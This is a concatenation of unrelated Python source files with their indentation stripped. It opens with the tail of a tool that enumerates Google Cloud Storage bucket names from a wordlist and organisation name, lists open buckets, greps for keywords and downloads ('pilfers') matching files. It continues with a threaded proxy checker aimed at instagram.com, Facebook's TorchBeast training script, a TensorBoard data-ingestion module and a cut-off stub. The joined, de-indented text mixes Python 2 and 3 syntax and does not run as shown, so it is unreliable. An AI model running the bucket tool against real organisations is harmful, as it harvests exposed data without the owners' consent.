by Andy
@netscylla'''
)
def cleanUp():
print("Cleaning Up Files")
def status403(line):
print(line.rstrip() + " is not accessible")
def queue_up_download(filepath):
download_q.put(filepath)
print('Collectable: {}'.format(filepath))
write_interesting_file(filepath)
def status200(response,grep_list,line):
print("Pilfering "+line.rstrip())
objects=xmltodict.parse(response.text)
Keys = []
interest=[]
try:
for child in objects['ListBucketResult']['Contents']:
Keys.append(child['Key'])
except:
pass
hit = False
for words in Keys:
words = (str(words)).rstrip()
collectable = line+words
if grep_list != None and len(grep_list) > 0:
for grep_line in grep_list:
grep_line = (str(grep_line)).rstrip()
if grep_line in words:
queue_up_download(collectable)
break
else:
queue_up_download(collectable)
def main():
global arguments
global grep_list
parser = ArgumentParser()
parser.add_argument("-o", dest="organisation", required=False, default=False, help="target an organisation")
parser.add_argument("-D", dest="download", required=False, action="store_true", default=False, help="Download files. This requires significant diskspace")
parser.add_argument("-d", dest="savedir", required=False, default='', help="if -D, then -d 1 to create save directories for each bucket with results.")
parser.add_argument("-l", dest="hostlist", required=True, help="")
parser.add_argument("-g", dest="grepwords", required=False, help="Provide a wordlist to grep for")
parser.add_argument("-m", dest="maxsize", type=int, required=False, default=1024, help="Maximum file size to download.")
parser.add_argument("-t", dest="threads", type=int, required=False, default=1, help="thread count.")
if len(sys.argv) == 1:
print_banner()
parser.error("No arguments given.")
parser.print_usage
sys.exit()
# output parsed arguments into a usable object
arguments = parser.parse_args()
# specify primary variables
grep_list = []
if arguments.grepwords:
    with open(arguments.grepwords, "r") as grep_file:
        grep_list = [g.strip() for g in grep_file.readlines()]
if arguments.download and arguments.savedir:
print("Downloads enabled (-D), and save directories (-d) for each host will be created/used")
elif arguments.download and not arguments.savedir:
print("Downloads enabled (-D), and will be saved to current directory")
else:
print("Downloads were not enabled (-D), not saving results locally.")
if arguments.organisation:
print("Organisation target mode Enabled")
else:
arguments.organisation = None
# start up bucket workers
for i in range(0,arguments.threads):
print('starting thread')
t = Thread(target=bucket_worker)
t.daemon = True
t.start()
# start download workers
for i in range(1, arguments.threads):
t = Thread(target=downloadWorker)
t.daemon = True
t.start()
with open(arguments.hostlist) as f:
for line in f:
if (arguments.organisation is not None):
bucket = 'http://storage.googleapis.com/'+line.rstrip()+'-'+arguments.organisation+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
if (arguments.organisation):
bucket = 'http://storage.googleapis.com/'+arguments.organisation+'-'+line.rstrip()+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
else:
bucket = 'http://storage.googleapis.com/'+line.rstrip()+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
if (arguments.organisation):
bucket = 'http://storage.googleapis.com/'+line.rstrip()+'/'
print('queuing {}'.format(bucket))
bucket_q.put(bucket)
bucket_q.join()
if arguments.download:
print "Finshed enumeration. Starting Download..."
download_q.join()
cleanUp()
if __name__ == "__main__":
main()
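# Hedged sketch (not part of the original tool): the kinds of bucket URL
# permutations main() queues for each wordlist entry, factored into a helper
# for illustration. The helper name is an assumption; see main() above for the
# exact set queued per flag combination.
def candidate_bucket_urls(word, organisation=None):
    """Return example Google Storage bucket URLs for a wordlist entry."""
    base = 'http://storage.googleapis.com/'
    word = word.rstrip()
    urls = [base + word + '/']
    if organisation:
        # Organisation mode also tries "<word>-<org>" and "<org>-<word>".
        urls += [base + word + '-' + organisation + '/',
                 base + organisation + '-' + word + '/']
    return urls
# Example: candidate_bucket_urls("backups", "example-org") includes
# 'http://storage.googleapis.com/backups-example-org/' and
# 'http://storage.googleapis.com/example-org-backups/'.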
|
main.py
|
import platform
from os import system
from time import sleep
from requests import Session
from threading import Thread, RLock
proxy_list = 'proxies.txt'
target_site = 'https://instagram.com'
def get_proxies():
proxies = []
with open(proxy_list, 'rt', encoding='utf-8') as proxies_file:
for line in proxies_file:
if not line.strip():
continue
ip, port = line.replace('\r', '').split(':')
port = int(port)
proxy = {'ip': ip, 'port': port}
proxies.append(proxy)
return proxies
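# The proxy list format assumed by get_proxies() above: one "ip:port" entry per
# line, e.g. (addresses are illustrative, taken from documentation ranges):
#   203.0.113.7:8080
#   198.51.100.23:3128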
class TestProxies:
def __init__(self, proxies):
self.worked = 0
self.failed = 0
self.lock = RLock()
self.active_brs = 0
self.is_alive = True
self.proxies = proxies
self.total = len(proxies)
self.test_link = target_site
def display(self):
system('cls' if platform.system() == 'Windows' else 'clear')
worked, failed, total = self.worked, self.failed, self.total
worked_per = round((worked/total) * 100, 2)
failed_per = round((failed/total) * 100, 2)
complete = round(worked_per + failed_per, 2)
print(f'Complete: {complete}%')
print(f'Active browsers: {self.active_brs}')
print(f'Proxies worked: {worked_per}% [{worked}]')
print(f'Proxies failed: {failed_per}% [{failed}]')
def test_proxy(self, proxy):
br = Session()
addr = '{}:{}'.format(proxy['ip'], proxy['port'])
addr = {'http': addr, 'https': addr}
br.proxies.update(addr)
try:
br.get(self.test_link, timeout=(10, 15))
with self.lock:
self.worked += 1
except:
with self.lock:
self.failed += 1
finally:
br.close()
if self.is_alive:
with self.lock:
self.display()
self.active_brs -= 1
def start(self):
for proxy in self.proxies:
while self.is_alive and self.active_brs >= 512:
sleep(0.01)  # yield instead of a hot busy-wait while the pool is saturated
if not self.is_alive:
break
with self.lock:
self.active_brs += 1
Thread(target=self.test_proxy, args=[proxy], daemon=True).start()
while self.is_alive and self.active_brs:
sleep(0.5)
self.display()
def stop(self):
self.is_alive = False
while self.active_brs:
try:
with self.lock:
self.display()
sleep(0.5)
except KeyboardInterrupt:
break
def examine(self):
failed = self.failed / self.total
worked = self.worked / self.total
if worked == 0 or (failed - worked) >= 0.1 or failed == worked:
    print('Bad proxy list')
else:
    print('Good proxy list')
if __name__ == '__main__':
test_proxies = TestProxies(get_proxies())
try:
test_proxies.start()
except KeyboardInterrupt:
test_proxies.stop()
finally:
test_proxies.examine()
|
monobeast.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import atari_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="PongNoFrameskip-v4",
help="Gym environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
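# Example invocations (illustrative only; this module is normally run from the
# torchbeast package, so adjust the module path and flags to your setup):
#   python -m torchbeast.monobeast --env PongNoFrameskip-v4 --num_actors 4 --total_steps 100000
#   python -m torchbeast.monobeast --mode test --env PongNoFrameskip-v4 --xpid <existing experiment id>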
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = prof.Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = environment.Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def learn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (1 - batch["done"]).float() * flags.discounting
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
scheduler.step()
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
actor_model.load_state_dict(model.state_dict())
return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.uint8),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def train(flags): # pylint: disable=too-many-branches, too-many-statements
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
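# lr_lambda decays the learning rate linearly from 1.0x to 0.0x of
# --learning_rate over flags.total_steps environment steps; "epoch" counts
# scheduler.step() calls, each of which corresponds to T * B environment steps.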
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
stats = learn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
def test(flags, num_episodes: int = 10):
if flags.xpid is None:
checkpointpath = "./latest/model.tar"
else:
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
gym_env = create_env(flags)
env = environment.Environment(gym_env)
model = Net(gym_env.observation_space.shape, gym_env.action_space.n, flags.use_lstm)
model.eval()
checkpoint = torch.load(checkpointpath, map_location="cpu")
model.load_state_dict(checkpoint["model_state_dict"])
observation = env.initial()
returns = []
while len(returns) < num_episodes:
if flags.mode == "test_render":
env.gym_env.render()
agent_outputs = model(observation)
policy_outputs, _ = agent_outputs
observation = env.step(policy_outputs["action"])
if observation["done"].item():
returns.append(observation["episode_return"].item())
logging.info(
"Episode ended after %d steps. Return: %.1f",
observation["episode_step"].item(),
observation["episode_return"].item(),
)
env.close()
logging.info(
"Average returns over %i steps: %.1f", num_episodes, sum(returns) / len(returns)
)
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = 1 - inputs["done"].float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
def create_env(flags):
return atari_wrappers.wrap_pytorch(
atari_wrappers.wrap_deepmind(
atari_wrappers.make_atari(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
def main(flags):
if flags.mode == "train":
train(flags)
else:
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
|
data_ingester.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides data ingestion logic backed by local event processing."""
import os
import re
import threading
import time
from tensorboard.backend.event_processing import data_provider
from tensorboard.backend.event_processing import plugin_event_multiplexer
from tensorboard.backend.event_processing import tag_types
from tensorboard.compat import tf
from tensorboard.data import ingester
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
tag_types.TENSORS: 10,
}
# TODO(@wchargin): Replace with something that works for third-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
logger = tb_logging.get_logger()
class LocalDataIngester(ingester.DataIngester):
"""Data ingestion implementation to use when running locally."""
def __init__(self, flags):
"""Initializes a `LocalDataIngester` from `flags`.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
Returns:
The new `LocalDataIngester`.
"""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
tensor_size_guidance.update(flags.samples_per_plugin)
self._multiplexer = plugin_event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=tensor_size_guidance,
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags),
detect_file_replacement=flags.detect_file_replacement,
)
self._data_provider = data_provider.MultiplexerDataProvider(
self._multiplexer, flags.logdir or flags.logdir_spec
)
self._reload_interval = flags.reload_interval
self._reload_task = flags.reload_task
if flags.logdir:
self._path_to_run = {os.path.expanduser(flags.logdir): None}
else:
self._path_to_run = _parse_event_files_spec(flags.logdir_spec)
# Conditionally import tensorflow_io.
if getattr(tf, "__version__", "stub") != "stub":
_check_filesystem_support(self._path_to_run.keys())
@property
def data_provider(self):
return self._data_provider
@property
def deprecated_multiplexer(self):
return self._multiplexer
def start(self):
"""Starts ingesting data based on the ingester flag configuration."""
def _reload():
while True:
start = time.time()
logger.info("TensorBoard reload process beginning")
for path, name in self._path_to_run.items():
self._multiplexer.AddRunsFromDirectory(path, name)
logger.info(
"TensorBoard reload process: Reload the whole Multiplexer"
)
self._multiplexer.Reload()
duration = time.time() - start
logger.info(
"TensorBoard done reloading. Load took %0.3f secs", duration
)
if self._reload_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(self._reload_interval)
if self._reload_task == "process":
logger.info("Launching reload in a child process")
import multiprocessing
process = multiprocessing.Process(target=_reload, name="Reloader")
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif self._reload_task in ("thread", "auto"):
logger.info("Launching reload in a daemon thread")
thread = threading.Thread(target=_reload, name="Reloader")
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif self._reload_task == "blocking":
if self._reload_interval != 0:
raise ValueError(
"blocking reload only allowed with load_interval=0"
)
_reload()
else:
raise ValueError("unrecognized reload_task: %s" % self._reload_task)
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
def _parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir_spec: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
# Keep this consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile("[a-zA-Z][0-9a-zA-Z.]*://.*")
for specification in logdir_spec.split(","):
# Check if the spec contains a group. A spec starting with xyz:// is regarded
# as a URI path spec instead of a group spec. If the spec looks like
# /foo:bar/baz, then we assume it's a path with a colon. If the spec looks
# like [a-zA-Z]:\foo then we assume it's a Windows path and not a single
# letter group.
if (
uri_pattern.match(specification) is None
and ":" in specification
and specification[0] != "/"
and not os.path.splitdrive(specification)[0]
):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(":")
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
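# Illustrative examples of the parsing above (a sketch, not a doctest):
#   _parse_event_files_spec("run1:/tmp/a,/tmp/b")
#     -> {os.path.realpath("/tmp/a"): "run1", os.path.realpath("/tmp/b"): None}
#   _parse_event_files_spec("gs://bucket/logs")  # URI specs skip realpath/expanduser
#     -> {"gs://bucket/logs": None}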
def _get_filesystem_scheme(path):
"""Extracts filesystem scheme from a given path.
The filesystem scheme is usually separated by `://` from the local filesystem
path if given. For example, the scheme of `file://tmp/tf` is `file`.
Args:
path: A string representing an input log directory.
Returns:
Filesystem scheme, None if the path doesn't contain one.
"""
if "://" not in path:
return None
return path.split("://")[0]
def _check_filesystem_support(paths):
"""Examines the list of filesystems user requested.
If TF I/O schemes are requested, try to import tensorflow_io module.
Args:
paths: A list of strings representing input log directories.
"""
get_registered_schemes = getattr(
tf.io.gfile, "get_registered_schemes", None
)
registered_schemes = (
None if get_registered_schemes is None else get_registered_schemes()
)
# Only need to check one path for each scheme.
scheme_to_path = {_get_filesystem_scheme(path): path for path in paths}
missing_scheme = None
for scheme, path in scheme_to_path.items():
if scheme is None:
continue
# Use `tf.io.gfile.get_registered_schemes` if possible.
if registered_schemes is not None:
if scheme not in registered_schemes:
missing_scheme = scheme
break
else:
# Fall back to `tf.io.gfile.exists`.
try:
tf.io.gfile.exists(path)
except tf.errors.UnimplementedError:
missing_scheme = scheme
break
except tf.errors.OpError:
# Swallow other errors; we aren't concerned about them at this point.
pass
if missing_scheme:
try:
import tensorflow_io # noqa: F401
except ImportError as e:
supported_schemes_msg = (
" (supported schemes: {})".format(registered_schemes)
if registered_schemes
else ""
)
raise tf.errors.UnimplementedError(
None,
None,
(
"Error: Unsupported filename scheme '{}'{}. For additional"
+ " filesystem support, consider installing TensorFlow I/O"
+ " (https://www.tensorflow.org/io) via `pip install tensorflow-io`."
).format(missing_scheme, supported_schemes_msg),
) from e
|
WaveForceCodec.py
|
import logging
import os
import struct
import threading
from Waves.WaveEnsemble import WaveEnsemble
logger = logging.getLogger("WaveForce Codec")
